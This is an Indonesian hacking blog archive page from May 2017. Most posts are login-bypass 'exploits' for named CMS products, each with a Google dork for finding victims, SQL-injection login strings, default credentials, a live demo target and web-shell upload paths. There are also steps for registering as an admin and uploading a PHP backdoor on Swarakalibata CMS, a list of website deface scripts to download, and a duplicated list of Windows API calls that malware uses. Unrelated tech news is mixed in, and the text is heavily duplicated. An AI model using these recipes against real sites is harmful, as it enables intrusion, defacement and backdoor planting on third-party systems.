Recent post
Archive for Mei 2017
# Exploit title: WebNegar CMS 2.1 Admin Bypass
# Date: 2017-05-31
# Tested on: Win7
# Author: M@rAz Ali
# Dork : intext:"Powered by WebNegar CMS"
############################################################################
Target : site.com
http://site.com/admin
Bypass : 'or' '=' < Username,Password
Shell Upload
> site.com/admin/?type=files&list=files
Upload Dir > site.com/files/u files
# Date: 2017-05-31
# Tested on: Win7
# Author: M@rAz Ali
# Dork : intext:"Powered by WebNegar CMS"
############################################################################
Target : site.com
http://site.com/admin
Bypass : 'or' '=' < Username,Password
Shell Upload
> site.com/admin/?type=files&list=files
Upload Dir > site.com/files/u files
# Exploit Title: WTS Technologies Admin Login bypass
# Dorks : "Powered by WTS Technologies"
# Date: 2017-05-26
# Author: Magelang1337
# Vendor : http://www.wtstechnologies.co.uk/
# Tested on: windows
======================================================
Tutor:
[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: '=' 'or' | admin
[+] Password: '=' 'or' | admin
======================================================
Admin Page : sitetarget.com/console/
======================================================
# Dorks : "Powered by WTS Technologies"
# Date: 2017-05-26
# Author: Magelang1337
# Vendor : http://www.wtstechnologies.co.uk/
# Tested on: windows
======================================================
Tutor:
[+] Dorking in google or other search enggine
[+] Open target
[+] Enter username and password with
[+] Username: '=' 'or' | admin
[+] Password: '=' 'or' | admin
======================================================
Admin Page : sitetarget.com/console/
======================================================
Mitos bertahun-tahun akan adanya kelas prosesor di atas Intel Core i7 akhirnya menjadi kenyataan di hari pertama gelaran Computex 2017. Selasa, 30 Mei 2017, Intel akhirnya merilis lini terbaru prosesor Extreme Edition mereka dengan varian tertinggi kini berada di bawah bendera Core i9 Series.
Intel sendiri hari ini meluncurkan lini prosesor generasi terbaru mereka untuk platform kelas enthusiast, Core X Series. Di kelas tertinggi adalah Core i9 yang terbagi lagi menjadi Core i9 Extreme Series dan Core i9 X-Series. Sementara dua varian lainnya adalah Core i7 yang diikuti Core i5 untuk varian entry level. Prosesor Intel Core X Series akan mengadopsi platform generasi terbaru dengan motherboard yang menggunakan soket dan chipset tipe terbaru.
Varian tertinggi lini prosesor Core X Series akan dilengkapi 18-core dan berkat teknologi Hyper Threading akan mampu menangani hingga 36 tugas dalam sekali jalan. Jumlah core semasif itu tentu saja menjadi angin segar untuk mereka yang membutuhkan prosesor dengan komputasi tinggi seperti di bidang konten kreator.
Tidak tanggung-tanggung bahkan di acara peluncuran ini Intel mendemokan kemampuan prosesor tersebut dalam menangani pemainan Mixed Reality sembari melakukan streaming permainan tersebut ke portal Twitch dengan sempurna. Tanpa prosesor dengan jumlah core masif rasanya akan sulit sekali dilakukan.
Sumber : http://www.jagatreview.com/2017/05/prosesor-intel-core-i9-diresmikan/
| # Title : Amazing Business Directory 2.0 auth by pass vulnerability
| # Author : Mohammad peywasteh (The Devil)
| # Telegram : @kambod
| # Tested on : windows 8.1 Fran�ais V.(Pro)
| # Version : 2.0
| # Vendor : http://www.phponly.com/business.html
| # Dork : "Copyright poSocial Directory"
========================================================================
login page : /admin
User : ADMIN OR 1=1#
Pass : ADMIN OR 1=1#
| # Author : Mohammad peywasteh (The Devil)
| # Telegram : @kambod
| # Tested on : windows 8.1 Fran�ais V.(Pro)
| # Version : 2.0
| # Vendor : http://www.phponly.com/business.html
| # Dork : "Copyright poSocial Directory"
========================================================================
login page : /admin
User : ADMIN OR 1=1#
Pass : ADMIN OR 1=1#
# Exploit Title: Sistem Informasi Nilai Online Admin Weak Password
# Google Dork: intitle:"Sistem informasi nilai online" username
# Vendor Homepage: http://sourcecodeaplikasi.info
# Date: 28/05/2017
# Author: 0N3R1D3R
# Team: Indonesia To World Team
# Facebook: https://www.facebook.com/indonesiatoworld/
# Tested on: Windows 10 x64
***************************************************
[+] Search the dork in Google
[+] Open target
[+] Enter username and password with
[+] Username: admin
[+] Password: admin
[+] Vuln? You redirected to dashboard
[+] If not work, you can try bypass with '=''or'
***************************************************
[+] Demo Site
[+] http://addarain.sch.id/nilai/
***************************************************
Thanks To Indonesia To World Team
.:: 0N3R1D3R | EBULOBO ::.
# Google Dork: intitle:"Sistem informasi nilai online" username
# Vendor Homepage: http://sourcecodeaplikasi.info
# Date: 28/05/2017
# Author: 0N3R1D3R
# Team: Indonesia To World Team
# Facebook: https://www.facebook.com/indonesiatoworld/
# Tested on: Windows 10 x64
***************************************************
[+] Search the dork in Google
[+] Open target
[+] Enter username and password with
[+] Username: admin
[+] Password: admin
[+] Vuln? You redirected to dashboard
[+] If not work, you can try bypass with '=''or'
***************************************************
[+] Demo Site
[+] http://addarain.sch.id/nilai/
***************************************************
Thanks To Indonesia To World Team
.:: 0N3R1D3R | EBULOBO ::.
Author: Yrid06 - T1KUS90T
CMS Swarakalibata adalah CMS Lokomedia yang dimodifikasi oleh Rizal Faizal, Dan sekarang sudah dikembangkan lebih jauh lagi oleh phpmu.com.
Bug Register & Upload ini sangat memungkinkan Attacker untuk mendaftar menjadi Admin/Kontributor dan meng-Upload Backdoor dengan Extensi PHP di modul berita tanpa harus mem-Bypass Extensi Backdoor tersebut.
Proof Of Concept:
Proof Of Concept:
- Cari target site yang menggunakan CMS Swarakalibata, atau juga bisa menggunakan Google dork dibawah untuk mencari target.
- Masuk kehalaman register dengan menambahkan register.html pada url target. contoh: site.com/register.html.
- Lengkapi form pendaftaran, pilih foto ( disini agan sudah bisa mengupload Backdoor dengan format extensi .php.pjpeg ).
- Klik daftar sekarang, dan agan akan dialihkan kehalaman Administrator.
- Upload Backdoor agan dengan cara tambah berita, upload gambar ( disini agan tidak perlu mem-Bypass extensi backdoor agan ).
- Untuk mengetahui letak Backdoor agan cukup dengan klik kanan pada gambar ( Backdoor ) yang agan upload dan klik copy.
Google Dork:
- intext:"PENDAFTARAN UNTUK KONTRIBUTOR ARTIKEL"
1. Script Deface by x404.hz
barang kali ada yang tertarik sama script deface ini silahkan comot di bawah :DDownload
2. Script Deface by 0xaN0n
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
3. Script Deface by x404.hz
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
4. Script Deface by JBRXXX (kata-kata untuk mantan)
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
5. Script Deface by Mr.WorldWide (edisi puasa)
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
6. Script Deface by Badc0de
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
7. Script Deface by Lunatic0de_
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
8. Script Deface by Security Ghost (edisi puasa)
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
9. Script Deface by Mr.EVIL
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
10. Script Deface by Con7ext
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
11. Script Deface by 17_PersonNotFound
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
12. Script Deface by T1KUS90T
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
13. Script Deface by Lysteriouss
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
14. Script Deface by Mr.Cleaftz
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
15. Script Deface by L1ght_R00t
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
16. Script Deface by Maestro40
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
17. Script Deface by 0x1958
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
18. Script Deface by n3vaholic
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
19. Script Deface by ng1nx
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
20. Script Deface by BlackM4rket
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
21. Script Deface by G3ring404
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
22. Script Deface by Mr.Rtp007
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
23. Script Deface by PYS404 (edisi galau)
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
24. Script Deface by FRK48 (edisi galau)
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
25. Script Deface by SUNEO
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
26. Script Deface by NginxDEX
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
27. Script Deface by Codename
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
28. Script Deface by Codename
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
29. Script Deface by 0xaN0n
jika kalian suka sama script deface tersebut silahkan download di bawah
Download
LuqmanSeoFriendly |
Fungsi-Fungsi Yang Digunakan Malware
�������
GetWindowsDirectory
�������
Mendapatkan path lengkap direktori windows,sehingga malware bisa mengcopy dirinya
sendiri ke direktori windows
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms724454(v=vs.85).aspx
GetWindowsDirectory
�������
Mendapatkan path lengkap direktori windows,sehingga malware bisa mengcopy dirinya
sendiri ke direktori windows
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms724454(v=vs.85).aspx
���-
RegOpenKey
���-
Fungsi untuk Membuka key registri untuk dibaca dan dimanipulasi
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms724895(v=vs.85).aspx
RegOpenKey
���-
Fungsi untuk Membuka key registri untuk dibaca dan dimanipulasi
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms724895(v=vs.85).aspx
�����-
GetAsyncKeyState
�����-
Digunakan untuk menentukan apakah key atau tombol tertentu sedang ditekan. Malware
yang menggunakan fungsi ini disebut sebagai keylogger [perekam ketikkan].
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms646293(v=vs.85).aspx
GetAsyncKeyState
�����-
Digunakan untuk menentukan apakah key atau tombol tertentu sedang ditekan. Malware
yang menggunakan fungsi ini disebut sebagai keylogger [perekam ketikkan].
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms646293(v=vs.85).aspx
����-
GetHostByName
����-
Digunakan untuk melakukan lookup DNS pada host tertentu sebelum membuat
koneksi IP ke host remote.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms738524(v=vs.85).aspx
GetHostByName
����-
Digunakan untuk melakukan lookup DNS pada host tertentu sebelum membuat
koneksi IP ke host remote.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms738524(v=vs.85).aspx
����
GetHostName
����
Mengambil nama host dari komputer. Malware menggunakan gethostname sebagai bagian dari pencurian
informasi dari korban.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms738527(v=vs.85).aspx
GetHostName
����
Mengambil nama host dari komputer. Malware menggunakan gethostname sebagai bagian dari pencurian
informasi dari korban.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms738527(v=vs.85).aspx
����
GetKeyState
����
Digunakan oleh keylogger untuk mendapatkan status key tertentu pada keyboard.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms646301(v=vs.85).aspx
GetKeyState
����
Digunakan oleh keylogger untuk mendapatkan status key tertentu pada keyboard.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms646301(v=vs.85).aspx
������
GetModuleFileName
������
Mendapatkan nama file secara lengkap dari sebuah modul yang dimuat dalam proses saat ini.
Malware dapat menggunakan fungsi ini untuk memodifikasi atau menyalin file di saat menjalankan proses.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms683197(v=vs.85).aspx
GetModuleFileName
������
Mendapatkan nama file secara lengkap dari sebuah modul yang dimuat dalam proses saat ini.
Malware dapat menggunakan fungsi ini untuk memodifikasi atau menyalin file di saat menjalankan proses.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms683197(v=vs.85).aspx
��������
CreateToolhelp32Snapshot
��������
Digunakan untuk membuat snapshot dari proses yang sedang berjalan berikut module atau thread pada proses tersebut
Malware sering menggunakan fungsi ini untuk memonitoring apa ada proses yang membahayakan dirinya,
sehingga malware dapat men-terminatenya dan lainnya
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms682489(v=vs.85).aspx
CreateToolhelp32Snapshot
��������
Digunakan untuk membuat snapshot dari proses yang sedang berjalan berikut module atau thread pada proses tersebut
Malware sering menggunakan fungsi ini untuk memonitoring apa ada proses yang membahayakan dirinya,
sehingga malware dapat men-terminatenya dan lainnya
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms682489(v=vs.85).aspx
����
ShellExecute
����
Digunakan untuk mengeksekusi program lain
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/bb762153(v=vs.85).aspx
ShellExecute
����
Digunakan untuk mengeksekusi program lain
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/bb762153(v=vs.85).aspx
������
URLDownloadToFile
������
untuk men-download file dari server web dan menyimpannya ke dalam harddisk.
malware yang menggunakan fungsi ini dikenal sebagai downloader
Link : http://msdn.microsoft.com/en-us/library/ms775123(v=vs.85).aspx
URLDownloadToFile
������
untuk men-download file dari server web dan menyimpannya ke dalam harddisk.
malware yang menggunakan fungsi ini dikenal sebagai downloader
Link : http://msdn.microsoft.com/en-us/library/ms775123(v=vs.85).aspx
����
GetVersionEx
����
Mendapatkan informasi tentang versi Windows yangsedang digunakan.
Hal ini dapat digunakan sebagai bagian dari pncurian informasi korban atau untuk mengatur
fungsi mana yang cocok diterapkan untuk korban
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms724451(v=vs.85).aspx
GetVersionEx
����
Mendapatkan informasi tentang versi Windows yangsedang digunakan.
Hal ini dapat digunakan sebagai bagian dari pncurian informasi korban atau untuk mengatur
fungsi mana yang cocok diterapkan untuk korban
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms724451(v=vs.85).aspx
�����
GetProcAddress
�����
Mengambil address dari suatu fungsi dalam DLL yang telah dimuat ke memori. Digunakan untuk
mengimpor fungsi dari DLL lain selain fungsi yang telah diimpor dalam file header PE.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms683212(v=vs.85).aspx
GetProcAddress
�����
Mengambil address dari suatu fungsi dalam DLL yang telah dimuat ke memori. Digunakan untuk
mengimpor fungsi dari DLL lain selain fungsi yang telah diimpor dalam file header PE.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms683212(v=vs.85).aspx
���������-
Process32First/Process32Next
���������-
Digunakan untuk memulai proses pencarian dari panggilan sebelumnya yaituCreateToolhelp32Snapshot.
untuk menemukan suatu proses tertentu untuk proses injeksi atau terminate
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms684834(v=vs.85).aspx
Process32First/Process32Next
���������-
Digunakan untuk memulai proses pencarian dari panggilan sebelumnya yaituCreateToolhelp32Snapshot.
untuk menemukan suatu proses tertentu untuk proses injeksi atau terminate
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms684834(v=vs.85).aspx
����
OpenProcess
����
Membuka handle untuk proses lain yang berjalan pada sistem.handle ini
dapat digunakan untuk membaca dan menulis ke memori proses lain atau untuk menginjeksi
kode ke proses lainnya.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms684320(v=vs.85).aspx
OpenProcess
����
Membuka handle untuk proses lain yang berjalan pada sistem.handle ini
dapat digunakan untuk membaca dan menulis ke memori proses lain atau untuk menginjeksi
kode ke proses lainnya.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms684320(v=vs.85).aspx
�����
RegisterHotKey
�����
Digunakan untuk mendaftarkan handle untuk diberitahu kapan saja korban memasukkan tertentu
kombinasi tombol (seperti CTRL+ALT+Y),
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms646309(v=vs.85).aspx
RegisterHotKey
�����
Digunakan untuk mendaftarkan handle untuk diberitahu kapan saja korban memasukkan tertentu
kombinasi tombol (seperti CTRL+ALT+Y),
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms646309(v=vs.85).aspx
����������
FindFirstFile / FindNextFile
����������
Digunakan untuk mencari sebuah file melalui direktori yang cocok dengan nama atau kondisi tertentu
dan bisa juga untuk menghitung atau mengkalkulasi file yang akan dijadikan target infeksi
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa364418(v=vs.85).aspx
FindFirstFile / FindNextFile
����������
Digunakan untuk mencari sebuah file melalui direktori yang cocok dengan nama atau kondisi tertentu
dan bisa juga untuk menghitung atau mengkalkulasi file yang akan dijadikan target infeksi
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa364418(v=vs.85).aspx
����-
FindResource
����-
Digunakan untuk menemukan sumber daya/resource dalam sebuah DLL yang dieksekusi atau telah dimuat,
Malware menggunakan resource untuk menyimpan string, informasi konfigurasi, atau file berbahaya.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms648042(v=vs.85).aspx
FindResource
����-
Digunakan untuk menemukan sumber daya/resource dalam sebuah DLL yang dieksekusi atau telah dimuat,
Malware menggunakan resource untuk menyimpan string, informasi konfigurasi, atau file berbahaya.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms648042(v=vs.85).aspx
����
LoadResource
����
mengeluarkan resource dari sebuah file PE ke dalam memori. Malware kadang-kadang menggunakan
resource untuk menyimpan string, konfigurasi informasi, atau muatan berbahaya lainnya
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms648046(v=vs.85).aspx
LoadResource
����
mengeluarkan resource dari sebuah file PE ke dalam memori. Malware kadang-kadang menggunakan
resource untuk menyimpan string, konfigurasi informasi, atau muatan berbahaya lainnya
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms648046(v=vs.85).aspx
���-
FindWindow
���-
digunakan untuk mencocokan nama window dari sebuah proses dengan list atau string tertentu
misal jika ditemukan nama window dari AV yang bernama AntiVirus maka malware akan berusaha
mn-terminate proses AV tersebut
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms633499(v=vs.85).aspx
FindWindow
���-
digunakan untuk mencocokan nama window dari sebuah proses dengan list atau string tertentu
misal jika ditemukan nama window dari AV yang bernama AntiVirus maka malware akan berusaha
mn-terminate proses AV tersebut
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms633499(v=vs.85).aspx
����
GetTempPath
����
Mendapatkan path file sementara yang dibuat atau akan dibuat.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa364992(v=vs.85).aspx
GetTempPath
����
Mendapatkan path file sementara yang dibuat atau akan dibuat.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa364992(v=vs.85).aspx
�����-
SetWindowsHookEx
�����-
Menetapkan fungsi hook yang akan dijalankan setiap kali suatu event tertentu dipanggil.
Umumnya digunakan dengan keyloggers dan spyware,
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms644990(v=vs.85).aspx
SetWindowsHookEx
�����-
Menetapkan fungsi hook yang akan dijalankan setiap kali suatu event tertentu dipanggil.
Umumnya digunakan dengan keyloggers dan spyware,
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms644990(v=vs.85).aspx
���-
CreateFile
���-
Membuat file baru atau membuka file yang sudah ada.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx
CreateFile
���-
Membuat file baru atau membuka file yang sudah ada.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa363858(v=vs.85).aspx
������
CreateFileMapping
������
Membuat buffer untuk mapping file yang memuat file ke memori dan
membuatnya dapat diakses melalui alamat memori. Biasanya malware tipe launcher, loader, dan injector
menggunakan fungsi ini untuk membaca dan memodifikasi file PE.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa366537(v=vs.85).aspx
CreateFileMapping
������
Membuat buffer untuk mapping file yang memuat file ke memori dan
membuatnya dapat diakses melalui alamat memori. Biasanya malware tipe launcher, loader, dan injector
menggunakan fungsi ini untuk membaca dan memodifikasi file PE.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa366537(v=vs.85).aspx
����
CreateMutex
����
Fungsi yang dapat digunakan oleh malware untuk membuat mutex,
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms682411(v=vs.85).aspx
CreateMutex
����
Fungsi yang dapat digunakan oleh malware untuk membuat mutex,
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms682411(v=vs.85).aspx
����-
CreateProcess
����-
fungsi yang digunakan malware untuk Membuat atau menjalankan proses baru.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx
CreateProcess
����-
fungsi yang digunakan malware untuk Membuat atau menjalankan proses baru.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx
����-
CreateService
����-
Biasanya malware Membuat service yang dapat membuat dirinya berjalan pada saat boot berlangsung,tanpa
perlu memanipulasi registry
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms682450(v=vs.85).aspx
CreateService
����-
Biasanya malware Membuat service yang dapat membuat dirinya berjalan pada saat boot berlangsung,tanpa
perlu memanipulasi registry
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms682450(v=vs.85).aspx
Tehnik atau Fungsi Khusus Pada Malware
Anti Debugging
������
IsDebuggerPresent
������
Cek untuk melihat apakah proses saat ini sedang di debug, fungsi ini sebagai bagian dari
teknik anti-debugging.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms680345(v=vs.85).aspx
IsDebuggerPresent
������
Cek untuk melihat apakah proses saat ini sedang di debug, fungsi ini sebagai bagian dari
teknik anti-debugging.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms680345(v=vs.85).aspx
������
OutputDebugString
������
menghasilkan Output string ke debugger jika sedang dalam debug.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa363362(v=vs.85).aspx
OutputDebugString
������
menghasilkan Output string ke debugger jika sedang dalam debug.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa363362(v=vs.85).aspx
���������
CheckRemoteDebuggerPresent
���������
Fungsi untuk melihat atau melakukan cek apakah proses tertentu atau proses diri sendiri sedang di debug.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms679280(v=vs.85).aspx
=======================================================
Lainnya,seperti akses internet,jaringan dan sebagainya
=======================================================
CheckRemoteDebuggerPresent
���������
Fungsi untuk melihat atau melakukan cek apakah proses tertentu atau proses diri sendiri sedang di debug.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms679280(v=vs.85).aspx
=======================================================
Lainnya,seperti akses internet,jaringan dan sebagainya
=======================================================
�������
AdjustTokenPrivileges
�������
Digunakan untuk mengaktifkan atau menonaktifkan hak akses tertentu pada proses. Biasanya Malware yang
melakukan injeksi pada proses sering memanggil fungsi ini untuk mendapatkan hak akses tambahan.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa375202(v=vs.85).aspx
AdjustTokenPrivileges
�������
Digunakan untuk mengaktifkan atau menonaktifkan hak akses tertentu pada proses. Biasanya Malware yang
melakukan injeksi pada proses sering memanggil fungsi ini untuk mendapatkan hak akses tambahan.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa375202(v=vs.85).aspx
��
BitBlt
��
Digunakan untuk menyalin data grafis dari satu perangkat ke perangkat lainnya.
Spyware kadang-kadang menggunakan fungsi ini untuk menangkap screenshot. Fungsi ini sering
ditambahkan oleh compiler sebagai bagian dari kode perpustakaan.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/dd183370(v=vs.85).aspx
BitBlt
��
Digunakan untuk menyalin data grafis dari satu perangkat ke perangkat lainnya.
Spyware kadang-kadang menggunakan fungsi ini untuk menangkap screenshot. Fungsi ini sering
ditambahkan oleh compiler sebagai bagian dari kode perpustakaan.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/dd183370(v=vs.85).aspx
��������
GetSystemDefaultLangId
��������
Mendapatkan pengaturan default bahasa untuk sistem. Hal ini dapat digunakan
untuk menyesuaikan menampilkan dan nama file, sebagai bagian dari survei dari korban
yang terinfeksi, atau dengan malware �patriotik� yang mempengaruhi sistem hanya dari daerah atau negara
tertentu.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/dd318120(v=vs.85).aspx
GetSystemDefaultLangId
��������
Mendapatkan pengaturan default bahasa untuk sistem. Hal ini dapat digunakan
untuk menyesuaikan menampilkan dan nama file, sebagai bagian dari survei dari korban
yang terinfeksi, atau dengan malware �patriotik� yang mempengaruhi sistem hanya dari daerah atau negara
tertentu.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/dd318120(v=vs.85).aspx
����-
NetShareEnum
����
Digunakan untuk menghitung atau kalkulasi jaringan yang di shared.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/bb525387(v=vs.85).aspx
NetShareEnum
����
Digunakan untuk menghitung atau kalkulasi jaringan yang di shared.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/bb525387(v=vs.85).aspx
�������
NtQueryDirectoryFile
�������
Mendapatkan informasi tentang file dalam direktori. Rootkit biasanya menghubungkan
fungsi ini untuk menyembunyikan file.
Link : http://msdn.microsoft.com/en-us/library/windows/hardware/ff556633(v=vs.85).aspx
NtQueryDirectoryFile
�������
Mendapatkan informasi tentang file dalam direktori. Rootkit biasanya menghubungkan
fungsi ini untuk menyembunyikan file.
Link : http://msdn.microsoft.com/en-us/library/windows/hardware/ff556633(v=vs.85).aspx
�����
VirtualAllocEx
�����
Sebuah rutinitas memori-alokasi yang dapat mengalokasikan memori dalam proses remote.
Malware menggunakan VirtualAllocEx sebagai bagian dari proses injeksi.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa366890(v=vs.85).aspx
VirtualAllocEx
�����
Sebuah rutinitas memori-alokasi yang dapat mengalokasikan memori dalam proses remote.
Malware menggunakan VirtualAllocEx sebagai bagian dari proses injeksi.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa366890(v=vs.85).aspx
�����-
VirtualProtectEx
�����-
Perubahan perlindungan pada daerah memori. Malware dapat menggunakan ini
berfungsi untuk mengubah bagian read-only dari memori untuk dieksekusi.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa366899(v=vs.85).aspx
VirtualProtectEx
�����-
Perubahan perlindungan pada daerah memori. Malware dapat menggunakan ini
berfungsi untuk mengubah bagian read-only dari memori untuk dieksekusi.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa366899(v=vs.85).aspx
������
WriteProcessMemory
������
Digunakan untuk menulis data ke proses remote. Malware menggunakan WriteProcessMemory
sebagai bagian dari proses injeksi.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms681674(v=vs.85).aspx
WriteProcessMemory
������
Digunakan untuk menulis data ke proses remote. Malware menggunakan WriteProcessMemory
sebagai bagian dari proses injeksi.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms681674(v=vs.85).aspx
����
GetTickCount
����
Mengambil jumlah milidetik sejak boot berlangsung. Fungsi ini
kadang-kadang digunakan untuk mengumpulkan informasi waktu.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms724408(v=vs.85).aspx
GetTickCount
����
Mengambil jumlah milidetik sejak boot berlangsung. Fungsi ini
kadang-kadang digunakan untuk mengumpulkan informasi waktu.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms724408(v=vs.85).aspx
�����-
InternetOpenUrl
�����-
Membuka URL tertentu untuk koneksi menggunakan FTP, HTTP, HTTPS atau.
URL
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa385098(v=vs.85).aspx
InternetOpenUrl
�����-
Membuka URL tertentu untuk koneksi menggunakan FTP, HTTP, HTTPS atau.
URL
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa385098(v=vs.85).aspx
�����-
InternetReadFile
�����-
Membaca data dari URL yang sebelumnya dibuka.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa385103(v=vs.85).aspx
InternetReadFile
�����-
Membaca data dari URL yang sebelumnya dibuka.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa385103(v=vs.85).aspx
������
InternetWriteFile
�����-
Menulis data ke URL yang sebelumnya dibuka.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa385128(v=vs.85).aspx
InternetWriteFile
�����-
Menulis data ke URL yang sebelumnya dibuka.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa385128(v=vs.85).aspx
�����
IsWoW64Process
�����
Digunakan oleh proses 32-bit untuk menentukan apakah proses yang berjalan itu adalah proses 64-bit
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms684139(v=vs.85).aspx
IsWoW64Process
�����
Digunakan oleh proses 32-bit untuk menentukan apakah proses yang berjalan itu adalah proses 64-bit
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/ms684139(v=vs.85).aspx
����������
Wow64DisableWow64FsRedirection
����������
Menonaktifkan File redirection yang terjadi di 32-bit file yang dimuat pada sistem 64-bit.
Jika aplikasi 32-bit membuat file ke \Windows\System32 setelah memanggil fungsi ini,
maka akan membuat file secara tepat ke \Windows\System32 bukan diarahkan ke \Windows\SysWOW64.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa365743(v=vs.85).aspx
Wow64DisableWow64FsRedirection
����������
Menonaktifkan File redirection yang terjadi di 32-bit file yang dimuat pada sistem 64-bit.
Jika aplikasi 32-bit membuat file ke \Windows\System32 setelah memanggil fungsi ini,
maka akan membuat file secara tepat ke \Windows\System32 bukan diarahkan ke \Windows\SysWOW64.
Link : http://msdn.microsoft.com/en-us/library/windows/desktop/aa365743(v=vs.85).aspx
Cara Membuat Simulasi Lampu Merah Lalulintas dengan VB6 - Lampu merah merupakan salah satu cara untuk mengendalikan jalannya lalulintas yang ada di jalan raya. Sudah tidak asing lagi buat kita khususnya bagi pengendara motor dan mobil, fungsi lampu merah adalah salah satu cara untuk mengatur jalannya lalulintas agar bisa diatur dengan baik, hal ini disebabkan karena adanya persimpangan jalan atau hal-hal lain yang dipasangi lampu merah.
